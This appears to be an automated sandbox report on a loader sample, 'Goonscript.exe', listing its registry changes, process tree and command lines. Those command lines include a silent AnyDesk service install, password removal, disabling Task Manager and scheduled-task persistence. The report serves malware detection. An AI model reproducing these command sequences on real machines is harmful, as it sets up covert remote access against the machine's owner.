Malware Analysis Report

2025-01-02 08:02

Sample ID 240509-w945lagh4y
Target Goonscript.exe
SHA256 d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2
Tags
privateloader discovery evasion execution loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2

Threat Level: Known bad

The file Goonscript.exe was found to be: Known bad.

Malicious Activity Summary

privateloader discovery evasion execution loader

PrivateLoader

Disables Task Manager via registry modification

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks installed software on the system

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies registry key

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 18:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 18:38

Reported

2024-05-09 18:40

Platform

win7-20240221-en

Max time kernel

100s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

Signatures

PrivateLoader

loader privateloader

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\AnyDesk.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\ = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421441773" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000bb37722cf20817b7b0dc7d46be098c152ef441305dc662e503d539b5969f68f0000000000e80000000020000200000009d996f9baf97f521ff34220c7c6ab94dc972269ab27fa833ab27c733c71e80b790000000ef8138affdefe7b2e74f659c9a673dcece7731e14b16d4cabc21de8d2dde79cee61e831f717b28ff4944241ee741b309ac69911ccb3fd66555104884227f1209e147f201bb44a77078d4963ff29de0e15c21a187d04c4039e41de7b942bd21ee302260c8c3e1cec29e3589ea9bfa9c1aa3d0ce80bda6f5381eda330ddbcaa96ef735cac9449129f3112a22d7842ac59340000000c8c238032b22d41d5ddfcf40a52bde9a1a72e9b12b203d271c133193fa0d3e17c4ce07740cfefd5b9371516635bd132c673ca8a1faaaf9d8b8c034bd2caada52 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{51F21011-0E33-11EF-815A-6A55B5C6A64E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "yes" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\AutoHide = "yes" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\Total = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000aef56000a9325e635ee5c7e8ab4c6739444f10c78e634c943d4b9e8bc19e5b98000000000e80000000020000200000004f5f3782c5a6922c1ec25a277c5c47aab494fc2061c30aa83ebd25f89232ebb320000000473e7a5d71b0f005436c7b3087a5c00e1dd2d81c44e8393496e2daf2759d00944000000088328a5a81bca919e5377338580630649dbf650ee99cd8950041073e53a569791708c6e05ddd1a1ed4f60862221d8d75aff86771c12fa46673dbfbfb25dfc610 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cd931740a2da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Goonscript.exe

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

